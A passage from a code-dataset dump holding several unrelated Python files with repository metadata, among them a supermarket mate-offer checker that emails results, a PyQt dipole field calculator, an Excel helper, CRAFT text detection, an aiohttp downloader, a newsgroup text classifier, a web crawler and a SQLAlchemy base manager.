64367 Mühltal / Nieder-Ramstadt\n 240276: REWE Markt GmbH, Eberstädter Str. 
94 None, 64319 Pfungstadt\n    \"\"\"\n    print(\"Checking REWE Angebote\")\n    market_id = 240070\n    resp = requests.get(f\"https://mobile-api.rewe.de/products/offer-search?categoryId=&marketId={market_id}\", headers=headers)\n    assert resp.status_code == 200\n    j = resp.json()\n    results_rewe = list()\n    for item in j['items']:\n        #print(item['name'])\n        if \"mate\" in item['name'].lower():\n            #print(f\"REWE HIT\\n{json.dumps(item, indent=4)}\")\n            results_rewe.append(item)\n    return results_rewe\n\n\ndef send_mail(message):\n    # credit: https://www.authsmtp.com/python/index.html\n\n    msg = MIMEMultipart()\n    msg['From'] = smtpfrom\n    msg['To'] = smtpto\n    msg['Subject'] = \"Gibt's mal wieder Mate?\"\n    msg.attach(MIMEText(message, 'plain'))\n\n    server = smtplib.SMTP_SSL(smtphost)\n    server.login(username, password)\n    server.sendmail(msg['From'], msg['To'], msg.as_string())\n    server.quit()\n    print(\"Sent mail\")\n\n\nif __name__ == '__main__':\n\n    output = f\"## Mate Checker Results {arrow.now().format()} ##\\n\\n\"\n    output += \"###### BEGIN Tegut ######\\n\"\n    output += f\"Angebote der Woche: {get_tegut_angebot_url()}\\n\\n\"\n    output += do_tegut()\n    output += \"###### END Tegut ######\\n\\n\\n\"\n    output += \"###### BEGIN Rewe ######\\n\"\n    rewe_list = do_rewe()\n    for item in rewe_list:\n        item_text = f\"{item['name']} {item['price']} {item['_links']['image:m']['href']}\\n\"\n        output += item_text\n    output += \"###### END Rewe ######\"\n\n    print(output)\n    send_mail(output)\n", "repo_name": "kmille/Ist-die-Mate-im-Angebot", "sub_path": "mate-check.py", "file_name": "mate-check.py", "file_ext": "py", "file_size_in_byte": 4180, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "86", "api": [{"api_name": "arrow.now", "line_number": 24, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 30, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 35, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 67, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 82, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 86, "usage_type": "call"}, {"api_name": "smtplib.SMTP_SSL", "line_number": 88, "usage_type": "call"}, {"api_name": "arrow.now", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "46126021412", "text": "from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QPushButton, QVBoxLayout, QLabel, QDialog, QMessageBox\nfrom PyQt5 import QtGui\nimport sys\nimport mpmath as mp\nfrom EFP_Calculator_GUI import *\nfrom EF_of_dipole import *\nfrom copy import deepcopy\n\nmp.dps = 100\nclass myForm(QMainWindow):\n    '''\n    Purpose: Main GUI class that handles all the GUI operations and invokes the functions that calculate the results\n    '''\n    def __init__(self):\n        super().__init__()\n        self.ui = Ui_MainWindow()\n        self.ui.setupUi(self)\n        self.ui.textBrowser.setOpenExternalLinks(True)\n        self.ui.textBrowser_2.setOpenExternalLinks(True)\n        self.ui.mdiArea.addSubWindow(self.ui.subwindow)\n        self.ui.mdiArea.addSubWindow(self.ui.help_subwindow)\n        self.ui.mdiArea.addSubWindow(self.ui.about_subwindow)\n        self.ui.calculate_pushButton.clicked.connect(self.cal_result)\n        self.show()\n\n\n    def mistakes_disp(self, errors:list):\n        '''\n        Purpose: to display a popup message with a list of all the invalid values\n        '''\n        # First line of 
error message\n        message = 'Invalid input received for the following attribute(s):\\n'\n\n        # Editing Message as per the errors\n        for i, error in enumerate(errors):\n            message += str(i+1) + ' : ' + error + '\\n'\n\n        # Displaying error message\n        response = QMessageBox.question(self, 'Errors!', message, QMessageBox.Ok )\n\n        # Closing Message Box\n        if response == QMessageBox.Yes:\n            sys.exit()\n\n\n    def results_disp(self):\n        '''\n        Purpose: to calculate the results and display them\n\n        Variables Used:\n        1. DM = to store the value of dipole moment\n        2. Exact_Potential = to store the exact potential calculated\n        3. Approx_Potential = to store the value of approx potential calculated\n        4. Error = to store the error, i.e. the difference between the exact and approximate potentials\n        '''\n\n        DM = dipole_moment(self.charge, self.a)\n        self.ui.DM_lineEdit.setText(str(DM))\n\n        Exact_Potential = dipole(self.r, self.angle, self.charge, self.a)\n        self.ui.EP_lineEdit.setText(str(Exact_Potential))\n\n        Approx_Potential = dipole_approx(self.r, self.angle, self.charge, self.a)\n        self.ui.AP_lineEdit.setText(str(Approx_Potential))\n\n        Error = diff(Exact_Potential, Approx_Potential)\n        self.ui.Error_lineEdit.setText(str(Error))\n\n    def cal_result(self):\n        '''\n        Purpose: to check whether all the input parameters have correct datatypes. If any value is invalid, invoke mistakes_disp();\n        otherwise invoke results_disp()\n\n        Variables Used:\n        1. self.r = to store the distance between the center of the dipole and the point of observation along with its unit\n        2. self.a = to store the distance between the center of the dipole and either charge along with its unit\n        3. self.angle = to store the angle between the point of observation, the positive charge and the center of the dipole along with its unit\n        4. self.charge = to store the value of the charge along with its unit\n        5. 
invalid_values = to store the names of the attributes for which invalid values were received\n        '''\n\n        invalid_values = list() # Initially, there are no invalid parameters\n\n        # checking if correct value is given to r\n        try:\n            self.r = ( float( self.ui.r_lineEdit.text()), self.ui.r_comboBox.currentText() )\n\n            # Checking if entered value is not negative\n            if self.r[0] <= 0:\n                invalid_values.append('r')\n        except ValueError:\n            invalid_values.append('r')\n\n        # checking if correct value is given to a\n        try:\n            self.a = ( float( self.ui.a_lineEdit.text() ), self.ui.a_comboBox.currentText() )\n\n            # Checking if entered value is not negative\n            if self.a[0] <= 0:\n                invalid_values.append('a')\n        except ValueError:\n            invalid_values.append('a')\n\n        # checking if correct value is given to angle\n        try:\n            self.angle = ( float( self.ui.theta_lineEdit.text() ), self.ui.theta_comboBox.currentText() )\n            if self.angle[0] < 0:\n                self.angle = (-self.angle[0], self.angle[1])\n        except ValueError:\n            invalid_values.append('Angle')\n\n        # checking if correct value is given to charge\n        try:\n            self.charge = ( float( self.ui.q_lineEdit.text() ), self.ui.q_comboBox.currentText() )\n            if not self.charge[0]:\n                invalid_values.append('Charge')\n            elif self.charge[0] < 0:\n                self.charge = (0 - self.charge[0], self.charge[1])\n        except ValueError:\n            invalid_values.append('Charge')\n\n\n        if len(invalid_values): # If there are some invalid values received\n            self.mistakes_disp(invalid_values)\n        else: # If there's no invalid value received\n            self.results_disp()\n\n\n# Executing our application\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n    w = myForm()\n    w.show()\n    sys.exit(app.exec_())", "repo_name": "Chetan-Goyal/Electric_Field_Calculator", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5326, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "mpmath.dps", "line_number": 9, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 10, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 39, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 39, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Ok", "line_number": 39, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Yes", "line_number": 42, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 42, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 131, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 131, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 134, "usage_type": "call"}]} +{"seq_id": "26001617616", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport xlrd\nimport xlwt\nfrom xlutils.copy import copy\n\n\nclass OperationExcel:\n    \"\"\"Operate on Excel files\"\"\"\n\n    def __init__(self, file_path=None, sheet_name=None):\n        if file_path:\n            self.file_path = file_path\n            self.sheet_name = sheet_name\n        else:\n            self.file_path = \"E:\\\\PyProject\\\\Hardware_Devices_Interface\\\\case1.xls\"\n            self.sheet_name = 'Sheet1'\n        self.data = self.get_data()\n\n    def get_data(self):\n        \"\"\"\n        Get the contents of the sheet\n        :return:\n        \"\"\"\n        data = xlrd.open_workbook(self.file_path)\n        table = data.sheet_by_name(self.sheet_name)\n        return table\n\n    def get_max_rows(self):\n        \"\"\"\n        Get the number of rows in the sheet\n        
:return:\n        \"\"\"\n        return self.data.nrows\n\n    def get_max_cols(self):\n        \"\"\"\n        Get the number of columns in the sheet\n        :return:\n        \"\"\"\n        return self.data.ncols\n\n    def get_cell_value(self, row, col):\n        \"\"\"\n        Get the data of a cell\n        :param row: row\n        :param col: column\n        :return:\n        \"\"\"\n        return self.data.cell_value(row, col)\n\n    def get_cell_type(self, row, col):\n        \"\"\"\n        Get the data type of a cell\n        :param row: row\n        :param col: column\n        :return:\n        \"\"\"\n        # 0: empty 1: string 2: number 3: date 4: boolean 5: error\n        return self.data.cell_type(row, col)\n\n    def get_row_value(self, row):\n        \"\"\"\n        Get the contents of a given row\n        :param row: row number\n        :return:\n        \"\"\"\n        return self.data.row_values(row)\n\n    def get_col_data(self, col):\n        \"\"\"\n        Get the contents of a given column\n        :param col: column number\n        :return:\n        \"\"\"\n        return self.data.col_values(col)\n\n    def write_value(self, row, col, value):\n        \"\"\"\n        Write data back to the Excel file\n        :param row: row\n        :param col: column\n        :param value: value\n        :return:\n        \"\"\"\n        # read_data = xlrd.open_workbook(self.file_path, formatting_info=True)\n        read_data = xlrd.open_workbook(self.file_path)\n        new_data = copy(read_data)  # convert the xlrd object into an xlwt object\n        table = new_data.get_sheet(self.sheet_name)\n        table.write(row, col, value, self.set_style())\n        new_data.save(self.file_path)\n\n    @staticmethod\n    def set_style(name='宋体', height=220, bold=False):\n        style = xlwt.XFStyle()  # initialize the style\n\n        font = xlwt.Font()  # create a font for the style\n        font.name = name  # set the specific font family\n        font.bold = bold  # set whether to use bold\n        font.color = 'black'  # black\n        # font.color_index = 4  # set the font color\n        font.height = height  # set the font size; 220 is an 11-point font (roughly 11 * 20)\n        style.font = font  # finally attach the customized font to the style\n\n        alignment = xlwt.Alignment()  # set the position of the text within the cell\n        alignment.horz = xlwt.Alignment.HORZ_CENTER  # horizontal: centered: HORZ_CENTER, left: HORZ_LEFT, right: HORZ_RIGHT\n        alignment.vert = xlwt.Alignment.VERT_CENTER  # vertical: centered: VERT_CENTER, top: VERT_TOP, bottom: VERT_BOTTOM\n        style.alignment = alignment\n\n        border = xlwt.Borders()  # add border lines to the cell\n        border.left = xlwt.Borders.THIN  # left\n        border.top = xlwt.Borders.THIN  # top\n        border.right = xlwt.Borders.THIN  # right\n        border.bottom = xlwt.Borders.THIN  # bottom\n        border.left_colour = 0x40  # set the border color; 0x40 is black\n        border.right_colour = 0x40\n        border.top_colour = 0x40\n        border.bottom_colour = 0x40\n        style.borders = border\n\n        return style\n\n\nif __name__ == '__main__':\n    opera = OperationExcel(file_path='E:\\\\case2.xlsx', sheet_name='Sheet1')\n    opera.get_data()\n    opera.get_cell_value(1, 1)\n    opera.write_value(3, 1, 'test style')\n    opera.get_cell_type(2, 0)\n    print(opera.get_max_rows())\n    print(opera.get_cell_value(1, 1))\n    print(opera.get_cell_type(2, 0))\n", "repo_name": "chaixin2018/unittest-demo", "sub_path": "Suite/test/excelFunction.py", "file_name": "excelFunction.py", "file_ext": "py", "file_size_in_byte": 4116, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "xlrd.open_workbook", "line_number": 25, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 87, "usage_type": "call"}, {"api_name": "xlutils.copy.copy", "line_number": 88, "usage_type": "call"}, {"api_name": "xlwt.XFStyle", "line_number": 95, "usage_type": "call"}, {"api_name": "xlwt.Font", "line_number": 97, "usage_type": "call"}, {"api_name": "xlwt.Alignment", "line_number": 105, "usage_type": "call"}, {"api_name": "xlwt.Alignment", "line_number": 106, "usage_type": "attribute"}, {"api_name": "xlwt.Alignment", "line_number": 107, "usage_type": "attribute"}, {"api_name": "xlwt.Borders", "line_number": 110, "usage_type": "call"}, {"api_name": "xlwt.Borders", "line_number": 111, "usage_type": "attribute"}, {"api_name": "xlwt.Borders", "line_number": 112, 
"usage_type": "attribute"}, {"api_name": "xlwt.Borders", "line_number": 113, "usage_type": "attribute"}, {"api_name": "xlwt.Borders", "line_number": 114, "usage_type": "attribute"}]} +{"seq_id": "3695217696", "text": "import os \nimport torch \nimport numpy as np\nfrom collections import OrderedDict\nimport cv2 \nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\n\nfrom .craft import CRAFT\nfrom . import imgproc\nfrom . import craft_utils\n\ndef crop_text(img, save_name, pts):\n pts_ = pts.reshape(-1, 2).astype(int)\n\n rect = cv2.boundingRect(pts_)\n x,y,w,h = rect\n croped = img[y:y+h, x:x+w].copy()\n\n ## (2) make mask\n pts_ = pts_ - pts_.min(axis=0)\n\n mask = np.zeros(croped.shape[:2], np.uint8)\n cv2.drawContours(mask, [pts_], -1, (255, 255, 255), -1, cv2.LINE_AA)\n\n ## (3) do bit-op\n dst = cv2.bitwise_and(croped, croped, mask=mask)\n\n ## (4) add the white background\n bg = np.ones_like(croped, np.uint8)*255\n cv2.bitwise_not(bg,bg, mask=mask)\n dst2 = bg+ dst\n\n cv2.imwrite(save_name, dst2)\n\ndef copyStateDict(state_dict):\n if list(state_dict.keys())[0].startswith(\"module\"):\n start_idx = 1\n else:\n start_idx = 0\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n name = \".\".join(k.split(\".\")[start_idx:])\n new_state_dict[name] = v\n return new_state_dict\n\ndef extract_wordbox(net, image):\n text_threshold = 0.7\n link_threshold = 0.4\n low_text = 0.4\n # resize\n img_resized, target_ratio, size_heatmap = imgproc.resize_aspect_ratio(image, 1280, interpolation=cv2.INTER_LINEAR, mag_ratio=1.5)\n ratio_h = ratio_w = 1 / target_ratio\n\n # preprocessing\n x = imgproc.normalizeMeanVariance(img_resized)\n x = torch.from_numpy(x).permute(2, 0, 1) # [h, w, c] to [c, h, w]\n x = Variable(x.unsqueeze(0)) # [c, h, w] to [b, c, h, w]\n\n x = x.cuda()\n\n # forward pass\n with torch.no_grad():\n y, feature = net(x)\n\n # make score and link map\n score_text = y[0,:,:,0].cpu().data.numpy()\n score_link = y[0,:,:,1].cpu().data.numpy()\n\n # Post-processing\n boxes, polys = craft_utils.getDetBoxes(score_text, score_link, text_threshold, link_threshold, low_text, False)\n\n # coordinate adjustment\n boxes = craft_utils.adjustResultCoordinates(boxes, ratio_w, ratio_h)\n if boxes != []:\n boxes[np.where(boxes < 0)] = 0\n boxes = expand_box(boxes)\n \n return boxes\n\ndef expand_box(boxes):\n new_boxes = []\n for box in boxes:\n rrect = cv2.minAreaRect(box)\n temp = (rrect[1][0], rrect[1][1])\n if temp[0] 10 and w > 10:\n # crop = img.copy()[y:y+h, x:x+w, :]\n # cv2.imwrite(os.path.join('res_img', img_file[:-4]+'_'+str(count)+'.jpg'), crop)\n save_name = os.path.join(save_folder, str(count)+'.jpg')\n crop_text(img, save_name, poly)", "repo_name": "duongduc2908/Freelance_DaNang", "sub_path": "textSpotting/CRAFTpytorch/inference.py", "file_name": "inference.py", "file_ext": "py", "file_size_in_byte": 3511, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "cv2.boundingRect", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.bitwise_and", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 30, "usage_type": "call"}, {"api_name": 
"numpy.uint8", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.bitwise_not", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 34, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 52, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.minAreaRect", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.boxPoints", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 90, "usage_type": "call"}, {"api_name": "craft.CRAFT", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn.DataParallel", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 100, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 100, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}]} +{"seq_id": "12383567939", "text": "import aiohttp\nfrom aiohttp import ClientTimeout\n\nfrom nhm_spider.http.response import Response\nfrom nhm_spider.common.log import get_logger\n\n\nclass Downloader:\n def __init__(self, spider):\n self.logger = get_logger(self.__class__.__name__)\n self.session = None\n self.spider = spider\n self.__headers = None\n self.__timeout = None\n self.__clear_cookie = None\n self.__use_session = None\n self.__opened = False\n\n async def open_downloader(self):\n async def on_request_start(session, trace_config_ctx, params):\n # print(\"Starting request\")\n pass\n\n async def on_request_end(session, trace_config_ctx, params):\n # print(\"Ending request\")\n pass\n\n self.__headers = self.spider.settings.get_dict(\"DEFAULT_REQUEST_HEADER\")\n request_timeout = self.spider.settings.get_int(\"REQUEST_TIMEOUT\", 180)\n self.__timeout = ClientTimeout(total=request_timeout)\n self.__clear_cookie = self.spider.settings.get_bool(\"CLEAR_COOKIE\", False)\n self.__use_session = self.spider.settings.get_bool(\"USE_SESSION\", True)\n\n trace_config = aiohttp.TraceConfig()\n trace_config.on_request_start.append(on_request_start)\n trace_config.on_request_end.append(on_request_end)\n\n self.session = aiohttp.ClientSession(headers=self.__headers, timeout=self.__timeout,\n trace_configs=[trace_config])\n self.__opened = True\n\n def close_downloader(self):\n self.__opened = False\n\n @property\n def is_opened(self):\n return self.__opened\n\n async def send_request(self, request):\n try:\n # 每次请求前清除session缓存的cookies 为response set-cookie中自动缓存的\n if self.__clear_cookie is True:\n self.session.cookie_jar.clear()\n # 是否每次创建新session请求\n if self.__use_session is False:\n session = aiohttp.ClientSession(headers=self.__headers, timeout=self.__timeout)\n response = await self.send(session, request)\n await session.close()\n else:\n response = await self.send(self.session, 
request)\n            if response is None:\n                return\n            # the response is closed automatically once its text has been read.\n            text = await response.text()  # may raise TimeoutError\n        except Exception as exception:\n            return exception\n        my_response = Response(request.url, request, text, response, response.status, response.headers)\n        return my_response\n\n    async def send(self, session, request):\n        \"\"\" Dispatch the request according to its HTTP method. \"\"\"\n        if request.method.lower() == \"get\":\n            response = await session.get(request.url, data=request.body, headers=request.headers,\n                                         cookies=request.cookies, proxy=request.proxy)\n        elif request.method.lower() == \"post\":\n            response = await session.post(request.url, data=request.form, headers=request.headers,\n                                          cookies=request.cookies, proxy=request.proxy)\n        else:\n            self.logger.error(\"Unsupported HTTP method passed in.\")\n            response = None\n        return response\n", "repo_name": "noHairMan/nhm-spider", "sub_path": "nhm_spider/core/downloader.py", "file_name": "downloader.py", "file_ext": "py", "file_size_in_byte": 3323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "nhm_spider.common.log.get_logger", "line_number": 10, "usage_type": "call"}, {"api_name": "aiohttp.ClientTimeout", "line_number": 30, "usage_type": "call"}, {"api_name": "aiohttp.TraceConfig", "line_number": 34, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 38, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 56, "usage_type": "call"}, {"api_name": "nhm_spider.http.response.Response", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "34782934376", "text": "import numpy as np\n\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\n\n\ndef main():\n    # Limiting the categories loaded\n    # categories = ['alt.atheism', 'soc.religion.christian',\n    #               'comp.graphics', 'sci.med']\n\n    twenty_train = fetch_20newsgroups(\n        subset='train', shuffle=True)\n    # twenty_train = fetch_20newsgroups(\n    #     subset='train', categories=categories, shuffle=True)\n\n    # All target names\n    # print(twenty_train.target_names)\n\n    # print(\"\\n\".join(twenty_train.data[0].split(\"\\n\")[:3]))\n\n    # First data and its target value\n    # print(twenty_train.data[0])\n    # print(twenty_train.target_names[twenty_train.target[0]])\n\n    text_clf = Pipeline([('vect', CountVectorizer(stop_words='english')),\n                         ('tfidf', TfidfTransformer()),\n                         ('clf', MultinomialNB()),\n                         ])\n\n    text_clf = text_clf.fit(twenty_train.data, twenty_train.target)\n\n    twenty_test = fetch_20newsgroups(subset='test', shuffle=True)\n    # twenty_test = fetch_20newsgroups(subset='test', categories=categories, shuffle=True)\n    predicted = text_clf.predict(twenty_test.data)\n    mean = np.mean(predicted == twenty_test.target)\n\n    print(mean)\n\n    docs_new = ['God is love', 'Spread the hate, cause the goverment is bad',\n                'George bush is my neighbor']\n\n    predicted = text_clf.predict(docs_new)\n\n    for doc, category in zip(docs_new, predicted):\n        print('%r => %s' % (doc, twenty_train.target_names[category]))\n\n    parameters = {'vect__ngram_range': [(1, 1), (1, 2)],\n                  'tfidf__use_idf': (True, False),\n                  'clf__alpha': (1e-2, 1e-3),\n                  }\n\n    gs_clf = GridSearchCV(text_clf, parameters, n_jobs=-1)\n    gs_clf = gs_clf.fit(twenty_train.data, twenty_train.target)\n\n    print(gs_clf.best_score_)\n 
print(gs_clf.best_params_)\n\n\nif __name__ == '__main__':\n    main()\n", "repo_name": "darcien/ML", "sub_path": "text-classification-attempt/multinomialNB-classify-pipeline.py", "file_name": "multinomialNB-classify-pipeline.py", "file_ext": "py", "file_size_in_byte": 2182, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "sklearn.datasets.fetch_20newsgroups", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfTransformer", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.datasets.fetch_20newsgroups", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "42286355701", "text": "from urllib.parse import urlparse, urljoin\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nclass Page:\n\n    def __init__(self, address):\n        self.url = urlparse(address)\n        self.address = address\n        self.page_rank = 0\n        self.links = {}\n        self.text = ''\n        try:\n            page = requests.get(self.url.geturl()).text\n            soup = BeautifulSoup(page, \"html.parser\")\n            self.links = {a['href'] for a in soup.find_all('a', href=True)}\n            self.text = soup.text\n            self._parse_urls()\n        except Exception:\n            raise ConnectionError()\n\n    def __str__(self):\n        return \"{}: {:.3f}\".format(self.address, self.page_rank)\n\n    def __eq__(self, other):\n        return self.address == other.address\n\n    def __hash__(self):\n        return hash(self.address)\n\n    def _parse_urls(self):\n        external_links = []\n        for link in self.links:\n            external_url = urlparse(link)\n            if not external_url.netloc:\n                external_links.append(urlparse(urljoin(self.url.geturl(), external_url.path)))\n            else:\n                external_links.append(external_url)\n        self.links = {link.geturl() for link in external_links}\n\n\nclass Crawler:\n\n    def __init__(self, start_page, max_depth=1):\n        self.start_page, self.max_depth = start_page, max_depth\n        self.web = {start_page}\n\n    def crawl_page(self, page, depth):\n        if depth >= self.max_depth:\n            return\n        print(\"{} : {}\".format(depth, page.address))\n        for link in page.links:\n            if not self.visited(link):\n                try:\n                    new_page = Page(link)\n                    self.crawl_page(new_page, depth + 1)\n                    self.web.add(new_page)\n                except ConnectionError:\n                    continue  # skip unreachable links instead of aborting the rest of the page\n\n    def visited(self, link):\n        return link in [p.address for p in self.web]\n\n    def crawl(self):\n        self.crawl_page(self.start_page, 0)\n", "repo_name": "ColluGianluca/WAAT-2021", "sub_path": "crawler.py", "file_name": "crawler.py", "file_ext": "py", "file_size_in_byte": 1989, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "urllib.parse.urlparse", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 36, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 38, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 38, "usage_type": "call"}]} +{"seq_id": 
"34208646157", "text": "from sqlalchemy import Column, Integer\nfrom sqlalchemy.ext.declarative import declared_attr\nfrom sqlalchemy.sql import text\n\nfrom .base import Base\nfrom .exceptions import NotFoundError, InvalidQueryError\n\nSession = None\n\n\nclass BaseManager(object):\n    \"\"\"\n    Base manager, every model will have this common manager\n    that allows us to perform common database operations\n    \"\"\"\n    def __init__(self, model):\n        self._model = model\n\n    def filter_by(self, order_by='id', limit=500, offset=0, **kwargs):\n        return Session.query(\n            self._model\n        ).filter_by(\n            **kwargs\n        ).order_by(order_by).limit(limit).offset(offset)\n\n    def get_for_update(self, **kwargs):\n        \"\"\"\n        http://docs.sqlalchemy.org/en/latest/orm/query.html?highlight=update#sqlalchemy.orm.query.Query.with_for_update  # noqa\n        \"\"\"\n        if not kwargs:\n            raise InvalidQueryError(\n                \"Can not execute a query without parameters\")\n        obj = Session.query(\n            self._model).with_for_update(\n                nowait=True, of=self._model).filter_by(**kwargs).first()\n        if not obj:\n            raise NotFoundError('Object not found')\n        return obj\n\n    def get(self, **kwargs):\n        if not kwargs:\n            raise InvalidQueryError(\n                \"Can not execute a query without parameters\")\n        obj = Session.query(self._model).filter_by(**kwargs).first()\n\n        if not obj:\n            raise NotFoundError('Object not found')\n        return obj\n\n    def count(self):\n        result = Session.execute(\n            'SELECT count(id) from {}'.format(self._model.__table__.name)\n        )\n\n        r = result.fetchone()\n        if len(r) > 0:\n            return r[0]\n        else:\n            return 0\n\n    def raw_sql(self, sql, **kwargs):\n        return Session.execute(text(sql), kwargs)\n\n    def add_all(self, data):\n        return Session.add_all(data)\n\n\nclass BaseModel(Base):\n    \"\"\"Abstract base model, contains common fields and methods for all models\n    \"\"\"\n    __abstract__ = True\n\n    id = Column(Integer, primary_key=True)\n\n    def __init__(self, **kwargs):\n        super(BaseModel, self).__init__(**kwargs)\n        for name, value in kwargs.items():\n            if not name.startswith('_'):\n                setattr(self, name, value)\n\n    @declared_attr\n    def objects(cls):\n        return BaseManager(cls)\n\n    def update(self):\n        Session.flush()\n\n    def add(self):\n        Session.add(self)\n        Session.flush()\n\n    def delete(self):\n        Session.delete(self)\n        Session.flush()\n", "repo_name": "Riffstation/sqlalchemypostgresutils", "sub_path": "pgsqlutils/orm.py", "file_name": "orm.py", "file_ext": "py", "file_size_in_byte": 2608, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "exceptions.InvalidQueryError", "line_number": 31, "usage_type": "call"}, {"api_name": "exceptions.NotFoundError", "line_number": 37, "usage_type": "call"}, {"api_name": "exceptions.InvalidQueryError", "line_number": 42, "usage_type": "call"}, {"api_name": "exceptions.NotFoundError", "line_number": 47, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.text", "line_number": 62, "usage_type": "call"}, {"api_name": "base.Base", "line_number": 68, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 73, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 73, "usage_type": "argument"}, {"api_name": "sqlalchemy.ext.declarative.declared_attr", "line_number": 81, "usage_type": "name"}]} +{"seq_id": "23234532981", "text": "import argparse\nimport logging\nimport random\nimport signal\nimport threading\nimport traceback\nfrom typing import Any\n\nfrom pytriton.triton import Triton, TritonConfig\nfrom tests.functional.common.models import 
